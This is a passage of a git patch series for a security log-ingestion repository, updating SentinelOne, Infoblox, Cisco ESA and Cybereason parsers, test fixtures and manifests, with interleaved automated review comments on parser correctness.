\"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\",\n \"type\": \"http\",\n \"documentation\": \"\",\n \"method\": \"get\",\n \"endpoint\": \"test\",\n \"responses\": [\n {\n \"uuid\": \"acc619a1-6ec7-45a6-888c-a7a860ed237b\",\n \"body\": \"{\\n \\\"message\\\": \\\"route required auth\\\"\\n}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n }\n ],\n \"rootChildren\": [\n {\n \"type\": \"route\",\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\"\n },\n {\n \"type\": \"folder\",\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\"\n }\n ],\n \"proxyMode\": false,\n \"proxyHost\": \"\",\n \"proxyRemovePrefix\": false,\n \"tlsOptions\": {\n \"enabled\": false,\n \"type\": \"CERT\",\n \"pfxPath\": \"\",\n \"certPath\": \"\",\n \"keyPath\": \"\",\n \"caPath\": \"\",\n \"passphrase\": \"\"\n },\n \"cors\": true,\n \"headers\": [\n {\n \"key\": \"Content-Type\",\n \"value\": \"application/json\"\n },\n {\n \"key\": \"Access-Control-Allow-Origin\",\n \"value\": \"*\"\n },\n {\n \"key\": \"Access-Control-Allow-Methods\",\n \"value\": \"GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS\"\n },\n {\n \"key\": \"Access-Control-Allow-Headers\",\n \"value\": \"Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With\"\n }\n ],\n \"proxyReqHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"proxyResHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n 
],\n \"data\": [\n {\n \"uuid\": \"38fb975d-c6f0-48d9-ae52-9e3fbc5cb654\",\n \"id\": \"8wey\",\n \"name\": \"Globals\",\n \"documentation\": \"\",\n \"value\": \"\"\n },\n {\n \"uuid\": \"2372a308-c890-479c-a18b-54abe4696967\",\n \"id\": \"zzay\",\n \"name\": \"ISODate\",\n \"documentation\": \"Datetime shared format comes from backend\",\n \"value\": \"\\\"{{now 'yyyy-MM-dd\\\\'T\\\\'HH:mm:ss\\\\'Z\\\\''}}\\\"\"\n },\n {\n \"uuid\": \"160c80f4-39c7-494d-a489-06da2e51aa87\",\n \"id\": \"g4qq\",\n \"name\": \"CreateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"email\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"c1d673ba-f7cf-4fd2-8cc8-449017a3ff17\",\n \"id\": \"ofz6\",\n \"name\": \"AuthenticateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"2844853c-c892-4671-9201-0b252711a36b\",\n \"id\": \"w34k\",\n \"name\": \"User\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"id\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"email\\\": \\\"{{faker 'internet.email'}}\\\",\\n \\\"phone\\\": \\\"{{faker 'phone.number' style='international'}}\\\",\\n \\\"createdAt\\\": \\\"{{data 'ISODate'}}\\\",\\n \\\"updatedAt\\\": \\\"{{data 'ISODate'}}\\\",\\n}\"\n },\n {\n \"uuid\": \"e698b979-5934-45f2-8612-5782a8b1e0be\",\n \"id\": \"77fk\",\n \"name\": \"Authentication\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"refreshToken\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"accessToken\\\": \\\"{{faker 'string.uuid'}}\\\"\\n}\"\n }\n ],\n 
\"callbacks\": []\n}", + "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", "event": { "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", "kind": "alert", + "provider": "Identity", + "reason": "This events is raised when a LDAP search Query is detected from the endpoint.", + "start": "2024-11-22T08:45:50Z", "type": "info" }, + "@timestamp": "2024-11-22T08:45:50Z", "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, "sentinelone": { "identity": { - "name": "Mocked api" + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-dc47-75de-8925-5f026bd5a705", + "name": "LDAP Search Detected", + "status": "NEW" } } } From 6a8f65023adad6d1ffe2c55447233833f3ff4db5 Mon Sep 17 00:00:00 2001 
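Review bot: The expected `process.hash.sha256` and `related.hash` values keep the vendor's uppercase hex digest, so if the parser (outside this hunk) copies `process.file.sha256` through unchanged, `related.hash` will not match the lowercase form that IOC feeds and most other modules' `related.hash` values use, and cross-source correlation on the hash silently misses. Consider lowercasing in the parser, e.g. `process.hash.sha256: "{{<input_field>.process.file.sha256 | lower}}"` with whatever the parser's input field is, and changing both expected values here to `61f897ed69646e0509f6802fb2d7c5e88c3e3b93c4ca86942e24d203aa878863`. Note also that this fixture is byte-identical to the test_alert_16.json deleted earlier in the patch, so test_alert_2 now only covers the null `sha1`/`md5` shape; a fixture with all three digests present would be the one to exercise how `related.hash` is aggregated.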
From: vg-svitla Date: Mon, 2 Dec 2024 18:32:45 +0200 Subject: [PATCH 117/150] Fix comments --- Infoblox/ddi/_meta/fields.yml | 10 ---------- Infoblox/ddi/ingest/parser.yml | 10 ++++++---- Infoblox/ddi/tests/query_log_dhcp_1.json | 7 +++---- Infoblox/ddi/tests/query_log_dhcp_2.json | 7 +++---- Infoblox/ddi/tests/query_log_dhcp_4.json | 4 ++-- Infoblox/ddi/tests/query_log_dhcp_5.json | 4 ++-- Infoblox/ddi/tests/query_log_dhcp_6.json | 4 ++-- Infoblox/ddi/tests/query_log_dns_1.json | 10 +++++----- 8 files changed, 23 insertions(+), 33 deletions(-) diff --git a/Infoblox/ddi/_meta/fields.yml b/Infoblox/ddi/_meta/fields.yml index 69f6818da..947dad6cf 100644 --- a/Infoblox/ddi/_meta/fields.yml +++ b/Infoblox/ddi/_meta/fields.yml @@ -13,21 +13,11 @@ infoblox.dhcp.interface_ip: name: infoblox.dhcp.interface_ip type: ip -infoblox.dhcp.lease_message: - description: The lease message. - name: infoblox.dhcp.lease_message - type: keyword - infoblox.dhcp.lease_time: description: The lease time. name: infoblox.dhcp.lease_time type: keyword -infoblox.dhcp.request_message: - description: The request message. - name: infoblox.dhcp.request_message - type: keyword - infoblox.dhcp.router_ip: description: The IP address of the router. name: infoblox.dhcp.router_ip diff --git a/Infoblox/ddi/ingest/parser.yml b/Infoblox/ddi/ingest/parser.yml index e54b3ef79..2597e3675 100644 --- a/Infoblox/ddi/ingest/parser.yml +++ b/Infoblox/ddi/ingest/parser.yml 
@@ -43,7 +43,7 @@ pipeline: ## For DNS message like: ## FORMERR resolving 'test.testing.io/AAAA/IN': 192.168.1.136#53 - DNS_FORMERR: "%{WORD:event_action} resolving '%{DATA:dns_question_name}/%{DATA:dns_question_type}/%{DATA:dns_question_class}': %{IP:client_ip}#%{NUMBER:client_port}" + DNS_FORMERR: "%{WORD:event_action} resolving '%{DATA:dns_question_name}/%{DATA:dns_question_type}/%{DATA:dns_question_class}': %{IP:destination_ip}#%{NUMBER:destination_port}" ## For other message like: ## r-l-e:192.168.1.113,Fixed,P76984,c4:d0:e3:b4:08:4d,1732119022,1732291822,,$ @@ -74,7 +74,7 @@ pipeline: ## For DHCP message like: ## Option 82: received a REQUEST DHCP packet from relay-agent eth2 with a circuit-id of "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0", a remote-id of "0a:44:70:46" for 192.168.1.222 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW) - DHCP_OTHER: 'Option %{NUMBER}: received a %{DATA:event_action} packet from %{NOTSPACE} %{DATA:infoblox_nios_log_dhcp_relay_interface_name} with a circuit-id of \"%{DATA:infoblox_nios_log_dhcp_circuit_id}\", a remote-id of \"%{DATA:infoblox_nios_log_dhcp_remote_id}\" for %{IP:client_ip} \(%{MAC:client_mac}\) lease time is %{DATA:infoblox_nios_log_dhcp_lease_time} seconds. \(%{DATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_OTHER: 'Option %{NUMBER}: received a %{DATA:event_action} packet from %{NOTSPACE} %{DATA:infoblox_nios_log_dhcp_relay_interface_name} with a circuit-id of \"%{DATA:infoblox_nios_log_dhcp_circuit_id}\", a remote-id of \"%{DATA:infoblox_nios_log_dhcp_remote_id}\" for %{IP:client_ip} \(%{MAC:client_mac}\) %{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}' - name: parse_event filter: "{{'DHCPACK' in original.message}}" 
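Review bot: The new `DHCP_OTHER` pattern (second hunk) drops the `%{DATA:infoblox_nios_log_dhcp_lease_time}` capture and folds the whole tail into `%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}`, yet the `set` stage still assigns `infoblox.dhcp.lease_time` from that capture and fields.yml keeps declaring it; unless another pattern outside this view captures `infoblox_nios_log_dhcp_lease_time`, that mapping and field are now dead for this message shape and should either go with the two other removed fields or get their capture back. If the value is still wanted, the fixtures show it is always the phrase before the parenthesised state, so a pattern like `lease time is %{DATA:infoblox_nios_log_dhcp_lease_time} seconds\. %{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}` keeps it while leaving the state token in `lease_message`, at the cost of `event.reason` no longer starting with "lease time is". The `DNS_FORMERR` rename to `destination_ip`/`destination_port` in the first hunk reads correctly, since the `addr#port` after the colon in that message is the server that answered, not the querying client.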
@@ -119,17 +119,19 @@ stages: - set: "@timestamp": "{{parse_datetime.result}}" event.action: "{{parse_event.message.event_action}}" + event.reason: "{{parse_event.message.infoblox_nios_log_dhcp_request_message or parse_event.message.infoblox_nios_log_dhcp_lease_message}}" source.port: "{{parse_event.message.client_port}}" source.mac: "{{parse_event.message.client_mac}}" + destination.ip: "{{parse_event.message.destination_ip}}" + destination.port: "{{parse_event.message.destination_port}}" + observer.ingress.interface.name: "{{parse_event.message.observer_ingress_interface_name}}" infoblox.dhcp.interface_ip: "{{parse_event.message.infoblox_nios_log_dhcp_interface_ip}}" infoblox.dhcp.trans_id: "{{parse_event.message.infoblox_nios_log_dhcp_trans_id}}" infoblox.dhcp.router_ip: "{{parse_event.message.infoblox_nios_log_dhcp_router_ip}}" - infoblox.dhcp.request_message: "{{parse_event.message.infoblox_nios_log_dhcp_request_message}}" - infoblox.dhcp.lease_message: "{{parse_event.message.infoblox_nios_log_dhcp_lease_message}}" infoblox.dhcp.lease_time: "{{parse_event.message.infoblox_nios_log_dhcp_lease_time}}" infoblox.dhcp.circuit_id: "{{parse_event.message.infoblox_nios_log_dhcp_circuit_id}}" diff --git a/Infoblox/ddi/tests/query_log_dhcp_1.json b/Infoblox/ddi/tests/query_log_dhcp_1.json index 43383a2e1..0e2ff27e2 100644 --- a/Infoblox/ddi/tests/query_log_dhcp_1.json +++ b/Infoblox/ddi/tests/query_log_dhcp_1.json @@ -5,7 +5,8 @@ "expected": { "message": "Option 82: received a REQUEST DHCP packet from relay-agent eth2 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.222 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)", "event": { - "action": "REQUEST DHCP" + "action": "REQUEST DHCP", + "reason": "lease time is undefined seconds. (NEW)" }, "dns": { "header_flags": [], 
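Review bot: The added `observer.ingress.interface.name: "{{parse_event.message.observer_ingress_interface_name}}"` reads a capture name that none of the patterns visible in this series produce; the `DHCP_OTHER` pattern touched in the previous hunk captures the relay interface as `infoblox_nios_log_dhcp_relay_interface_name`. Unless a pattern outside these hunks captures `observer_ingress_interface_name`, the key is never populated; either rename that capture in the pattern or, if the relay interface is what is meant, read `"{{parse_event.message.infoblox_nios_log_dhcp_relay_interface_name}}"` here. The new `event.reason`, `destination.ip` and `destination.port` lines follow the unconditional style of the existing `source.port` line, so they rely on the platform discarding empty renders when a capture is absent, which the updated fixtures suggest it does. The enclosing `- set:` entry and its stage start outside the hunk.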
@@ -13,9 +14,7 @@ }, "infoblox": { "dhcp": { - "circuit_id": "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0", - "lease_message": "NEW", - "lease_time": "undefined" + "circuit_id": "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0" } }, "related": { diff --git a/Infoblox/ddi/tests/query_log_dhcp_2.json b/Infoblox/ddi/tests/query_log_dhcp_2.json index 9474b00d8..44aebdb62 100644 --- a/Infoblox/ddi/tests/query_log_dhcp_2.json +++ b/Infoblox/ddi/tests/query_log_dhcp_2.json @@ -5,7 +5,8 @@ "expected": { "message": "Option 82: received a REQUEST DHCP packet from relay-agent 192.168.1.53 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.53 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)", "event": { - "action": "REQUEST DHCP" + "action": "REQUEST DHCP", + "reason": "lease time is undefined seconds. (NEW)" }, "dns": { "header_flags": [], @@ -13,9 +14,7 @@ }, "infoblox": { "dhcp": { - "circuit_id": "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0", - "lease_message": "NEW", - "lease_time": "undefined" + "circuit_id": "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0" } }, "related": { diff --git a/Infoblox/ddi/tests/query_log_dhcp_4.json b/Infoblox/ddi/tests/query_log_dhcp_4.json index 417007f30..826be7f66 100644 --- a/Infoblox/ddi/tests/query_log_dhcp_4.json +++ b/Infoblox/ddi/tests/query_log_dhcp_4.json @@ -5,7 +5,8 @@ "expected": { "message": "DHCPREQUEST for 192.168.1.208 from 00:50:56:ae:17:c6 (VDPSCE080019) via eth2 TransID 823c1fa3 uid 01:00:50:56:ae:17:c6 (RENEW)", "event": { - "action": "DHCPREQUEST" + "action": "DHCPREQUEST", + "reason": "RENEW" }, "dns": { "header_flags": [], @@ -13,7 +14,6 @@ }, "infoblox": { "dhcp": { - "lease_message": "RENEW", "trans_id": "823c1fa3" } }, diff --git a/Infoblox/ddi/tests/query_log_dhcp_5.json b/Infoblox/ddi/tests/query_log_dhcp_5.json index 14a6991a4..681472682 100644 --- a/Infoblox/ddi/tests/query_log_dhcp_5.json 
+++ b/Infoblox/ddi/tests/query_log_dhcp_5.json @@ -5,7 +5,8 @@ "expected": { "message": "DHCPREQUEST for 192.168.1.95 (192.168.1.95) from d8:94:03:ec:da:d1 via 192.168.1.95 TransID ac1b72c4: lease 192.168.1.95 unavailable.", "event": { - "action": "DHCPREQUEST" + "action": "DHCPREQUEST", + "reason": "lease 192.168.1.95 unavailable." }, "dns": { "header_flags": [], @@ -14,7 +15,6 @@ "infoblox": { "dhcp": { "interface_ip": "192.168.1.95", - "request_message": "lease 192.168.1.95 unavailable.", "router_ip": "192.168.1.95", "trans_id": "ac1b72c4" } diff --git a/Infoblox/ddi/tests/query_log_dhcp_6.json b/Infoblox/ddi/tests/query_log_dhcp_6.json index f0ca93fce..ad6128a51 100644 --- a/Infoblox/ddi/tests/query_log_dhcp_6.json +++ b/Infoblox/ddi/tests/query_log_dhcp_6.json @@ -5,7 +5,8 @@ "expected": { "message": "DHCPREQUEST for 192.168.1.159 from c8:09:a8:f8:cd:e8 via 192.168.1.159 TransID e711c0c1: ignored (unknown subnet).", "event": { - "action": "DHCPREQUEST" + "action": "DHCPREQUEST", + "reason": "ignored (unknown subnet)." }, "dns": { "header_flags": [], @@ -14,7 +15,6 @@ "infoblox": { "dhcp": { "interface_ip": "192.168.1.159", - "request_message": "ignored (unknown subnet).", "trans_id": "e711c0c1" } }, diff --git a/Infoblox/ddi/tests/query_log_dns_1.json b/Infoblox/ddi/tests/query_log_dns_1.json index 2c4c9a783..042f12e70 100644 --- a/Infoblox/ddi/tests/query_log_dns_1.json +++ b/Infoblox/ddi/tests/query_log_dns_1.json @@ -7,6 +7,11 @@ "event": { "action": "FORMERR" }, + "destination": { + "address": "192.168.1.136", + "ip": "192.168.1.136", + "port": 53 + }, "dns": { "header_flags": [], "question": { @@ -26,11 +31,6 @@ "ip": [ "192.168.1.136" ] - }, - "source": { - "address": "192.168.1.136", - "ip": "192.168.1.136", - "port": 53 } } } \ No newline at end of file From 5dd9ece3f663615741b67ba65d8a99d536197e57 Mon Sep 17 00:00:00 2001 
From: vg-svitla Date: Mon, 2 Dec 2024 18:35:01 +0200 Subject: [PATCH 118/150] Apply linter --- Infoblox/ddi/ingest/parser.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Infoblox/ddi/ingest/parser.yml b/Infoblox/ddi/ingest/parser.yml index 2597e3675..0fd9855e8 100644 --- a/Infoblox/ddi/ingest/parser.yml +++ b/Infoblox/ddi/ingest/parser.yml @@ -145,13 +145,13 @@ stages: {% if parse_event.message.flags_rd == "+" %}"RD",{% endif %} {% if parse_event.message.flags_cd == "C" %}"CD",{% endif %} ] - + - set: dns.type: query filter: '{{parse_event.message.get("response_code") == None}}' - set: dns.type: answer - dns.response_code: '{{parse_event.message.response_code}}' + dns.response_code: "{{parse_event.message.response_code}}" filter: '{{parse_event.message.get("response_code") != None}}' - set: @@ -161,7 +161,7 @@ stages: {"name": "{{record[0]}}", "ttl": {{record[1]}}, "class": "{{record[2]}}", "type": "{{record[3]}}", "data": "{{record[4][:-1]}}"}, {%- endfor -%} ] - filter: '{{parse_event.message.get(''dns_records'') != None}}' + filter: "{{parse_event.message.get('dns_records') != None}}" - set: network.transport: tcp @@ -170,7 +170,7 @@ stages: network.transport: udp filter: '{{parse_event.message.get("flags_tcp") != None and parse_event.message.flags_tcp != "T"}}' - set: - network.transport: '{{parse_event.message.network_transport | lower }}' + network.transport: "{{parse_event.message.network_transport | lower }}" filter: '{{parse_event.message.get("network_transport") != None}}' - set: From 243d7ed895f12d4dc48ed17c9c1047d8ccc3f6e0 Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Mon, 2 Dec 2024 18:37:18 +0200 Subject: [PATCH 119/150] Fix smart-descriptions.json --- Infoblox/ddi/_meta/smart-descriptions.json | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/Infoblox/ddi/_meta/smart-descriptions.json b/Infoblox/ddi/_meta/smart-descriptions.json index 2b9898cb2..86ef44018 100644 
--- a/Infoblox/ddi/_meta/smart-descriptions.json +++ b/Infoblox/ddi/_meta/smart-descriptions.json @@ -29,11 +29,19 @@ ] }, { - "value": "Query on {source.ip}", + "value": "Query from {source.ip}", "conditions": [ { "field": "source.ip" } ] + }, + { + "value": "Query to {destination.ip}", + "conditions": [ + { + "field": "destination.ip" + } + ] } ] From 4021572be3c0a923081619948426a55389e019e5 Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Mon, 2 Dec 2024 19:00:32 +0200 Subject: [PATCH 120/150] Fix cisco-esa --- Cisco/cisco-esa/ingest/parser.yml | 3 ++- Cisco/cisco-esa/tests/test_attachments_details.json | 6 +++++- Cisco/cisco-esa/tests/test_ingest_log2.json | 6 +++++- Cisco/cisco-esa/tests/test_ingest_log5.json | 7 ++++++- Cisco/cisco-esa/tests/test_ingest_log7.json | 3 ++- 5 files changed, 20 insertions(+), 5 deletions(-) diff --git a/Cisco/cisco-esa/ingest/parser.yml b/Cisco/cisco-esa/ingest/parser.yml index b20c3d0d7..9dc1d4b5e 100644 --- a/Cisco/cisco-esa/ingest/parser.yml +++ b/Cisco/cisco-esa/ingest/parser.yml @@ -70,6 +70,7 @@ pipeline: external: name: dict.parse properties: + output_field: message input_field: > {{ parsed_event.message.ESAURLDetails }} @@ -213,7 +214,7 @@ stages: {% endif %} {%- endfor %}] cisco.esa.url: >- - [{% for url, details in dict(json_event_url_details.message).items() %} + [{% for url, details in json_event_url_details.message.items() %} "{% if details.get('ExpandedUrl') is not none %}{{ details.ExpandedUrl }}{% else %}{{ url }}{% endif %}" {% if not loop.last %},{% endif %} {% endfor %}] diff --git a/Cisco/cisco-esa/tests/test_attachments_details.json b/Cisco/cisco-esa/tests/test_attachments_details.json index 448ea5b15..56ac98c83 100644 --- a/Cisco/cisco-esa/tests/test_attachments_details.json +++ b/Cisco/cisco-esa/tests/test_attachments_details.json 
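Review bot: With `Query from {source.ip}` and the new `Query to {destination.ip}` kept as separate entries, an event carrying both fields gets whichever entry the consumer evaluates first, presumably the `source.ip` one since it is listed first. If both addresses are meant to show for such events, a combined entry with both conditions (`"value": "Query from {source.ip} to {destination.ip}"`) placed before these two would make the choice explicit rather than order-dependent. The enclosing array starts outside the hunk.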
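Review bot: In the `cisco.esa.url` template each URL is interpolated into a hand-built JSON array as `"{{ details.ExpandedUrl }}"` or `"{{ url }}"` with no escaping, so a URL containing `"` or `\` — values taken from mail content, outside the operator's control — produces invalid JSON and the field is likely dropped or mangled on exactly the messages an analyst most needs it for. If the engine exposes Jinja's built-in `tojson` filter, `{{ (details.ExpandedUrl if details.get('ExpandedUrl') is not none else url) | tojson }}` emits a correctly quoted element (without the literal surrounding quotes); otherwise a comment above the key should record the limitation. Removing the `dict()` wrapper also changes behaviour when `ESAURLDetails` is absent: with Jinja's default `Undefined`, iterating an undefined value yields nothing, whereas `.items()` on it raises, and `test_ingest_log7` covers an empty mapping rather than a missing key, so `(json_event_url_details.message or {}).items()` is a cheap guard. The enclosing `- set:` entry starts outside the hunk.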
@@ -54,7 +54,11 @@ "domain": { "age": "30 days (or greater)" } - } + }, + "url": [ + "http://schemas.microsoft.com/office/2004/12/omml", + "http://www.w3.org/TR/REC-html40" + ] } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log2.json b/Cisco/cisco-esa/tests/test_ingest_log2.json index d8d9bc5a6..afb99f16d 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log2.json +++ b/Cisco/cisco-esa/tests/test_ingest_log2.json @@ -57,7 +57,11 @@ "domain": { "age": "9 years 3 months 14 days" } - } + }, + "url": [ + "http://mandrill.appc.cisco.com/track/open.php?u=30372747&id=d57275a6c9df40418a90fd977e3bf506", + "https://bce-demo.appc.cisco.com/sensors/a7b04388-0f6e-11e9-8def-0242ac110002" + ] } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log5.json b/Cisco/cisco-esa/tests/test_ingest_log5.json index a85f9845d..553425b45 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log5.json +++ b/Cisco/cisco-esa/tests/test_ingest_log5.json @@ -51,7 +51,12 @@ "domain": { "age": "30 days (or greater)" } - } + }, + "url": [ + "https://facebook.com/u/john.doe", + "https://tiktok.com", + "www.twitter.com" + ] } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log7.json b/Cisco/cisco-esa/tests/test_ingest_log7.json index b77951dcf..29716af19 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log7.json +++ b/Cisco/cisco-esa/tests/test_ingest_log7.json @@ -54,7 +54,8 @@ "domain": { "age": "30 days (or greater)" } - } + }, + "url": [] } }, "email": { From 9daca2729d6227513899135a5e32b0eb8337b757 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 2 Dec 2024 18:41:51 +0100 Subject: [PATCH 121/150] fix(CybeReason): fix the identifier of the connector associated to the intake --- CybeReason/malop-json/_meta/manifest.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CybeReason/malop-json/_meta/manifest.yml b/CybeReason/malop-json/_meta/manifest.yml index f1b4f8074..e4cdd5419 100644 --- a/CybeReason/malop-json/_meta/manifest.yml 
+++ b/CybeReason/malop-json/_meta/manifest.yml @@ -1,7 +1,7 @@ uuid: 9f89b634-0531-437b-b060-a9d9f2d270db name: Cybereason EDR slug: cybereason-malop-json -automation_connector_uuid: ff092b32-68dc-11ee-8c99-0242ac120002 +automation_connector_uuid: 8128d255-22df-4f4c-96af-ca6c1123f4cf automation_module_uuid: b96361fb-a01b-4ae7-8927-9622b9ea0acf description: >- From 82eeda946e6c3e4819b3cf7808c6d5f0623bc8fc Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Tue, 3 Dec 2024 17:30:15 +0100 Subject: [PATCH 122/150] fix(SentinelOne): fix the logo for identity --- SentinelOne/identity/_meta/logo.png | Bin 27937 -> 1853 bytes 1 file changed, 0 insertions(+), 0 deletions(-) 
diff --git a/SentinelOne/identity/_meta/logo.png b/SentinelOne/identity/_meta/logo.png index bad66643418120e4e1dbdc385258d64188b37661..817c84f53c5bbb9277dd6ba33f3ccb0ab2078e36 100644 GIT binary patch literal 1853 zcmcJQ|6kHc8o)vMl7e`(t6qwxU3Ha(r=~6z23nin0>#|&3#IL9qF^hK2x)>@)NU!6 z$)+oT>z5Uc*y1!bInK5fEtGXNF~z#XL_+CA?e;p|{c!)o{xHuo&&>0hndd#v%yTt? zc*Moo(-{N;xx_>tA_H1!ZyR8M#A#tcAP^i9bBJ)P=-UMY=}L0epZov)GCg}x(zvfB zCl?m)(i)iiZp&5v;pn}&iOpHnA1iY_l+@YKa>*scuB&RzHmUoKx`t=(NHNv?gdNvH z2-(hlH+C^o(_f-b%?)?G7c+-B;`bj6NaTZ}Pm14sY30x1aCOyLTN&i<%-}0uA$7*x z_?vB@qjHCRUCw`qL1C;Rnq1CCr+r#?5PrE$tYPEOMJI`Ch(<;HI)c1Qw-#0yClV zJQ!%j*G@Y6XCE6s$zZ!n(%ScE3e@=l___8p;SA4^$`eavzWw0+r+DIqZhVE~>M}T7 zCI_Z)9G>bMH^5o-$Vf=LgoazP2g+6*u$XiD0sg8p7L%+W;1QvW^jwAEBGHYJzFT1^ zgDn|3f(6t*p>5W!!%K(H4>+sPUW73MIefbNKH<}Wa2iv>pQ>-~3x#%CDLMkP+RL(aAGs)=#O9cdQi58%fEes(aHicurGZb{tb66K_2QUYhP~ zJbSQeNL(fFP3)daq^=+a+tuRzqmLFp3xd9gyh%XS2$;j(txmZ zf8ov=1Gc7A#?wn&uSW-1sq!%qjPtK2Y!bUvo_y?VuylgaoZ8y_9UR>5AfyA zc0ju}>(23kkWVvRf!k4KJSX?chK@ap_;kB64}7Izp`DO%3ZownbCSFhfNc*jBu-Gq0uJy{xmns28V zq4Ogt?$xze+St6QTsdBFK#d8v3ZpOt!Jfw$8F2RWi>Rgz`$II+ZFm8hSHIhsK$b-L zWVWEN)!R%$xE`;1)Cf5D0Z$Ojjdag&BVk`!8Yt0}p&0VMooecKUEI>`} zW*E&E_zot&N9ysI9e8%aMg>2e#=}SoGaS3V1yM3MfSv+TA_FY}9Wni`F*Xsn%M#CD zXDYiYl*PUGy=T=ERC0?+D}jg^S+Pr(uf?E%iI46Te=12 zR+#}i32vgwCTAjihtU$|u@IW?oU3l{C|!@w$Kg8@Clvgt3%o^1L#AVw4Mf4$_rVwi z;BIwl$rRl9+L7g?g?MRZp{7j;g($*L>rGQd+g=e{uf2CA2jkgN>BjlRBaPOG4%?=p rHgIkF*!Nse!&b*XsyzI^@|X`UDnrM|o3!VFvIvSfOgtoy%qaUEoY88+ literal 27937 zcmeFXWl)>Z_bwWsNb%ss358Oe0!50JAO#AfkO0A*;!@m;1-C+Jp-`X{2<}$gU5a~g zhZ0;*`a3dn=YQ|FJ9FmDoOcF3ZgGG;YE^RN7<7HRNA3U{2%Z-h+?=KpR?NlHClmpQ5 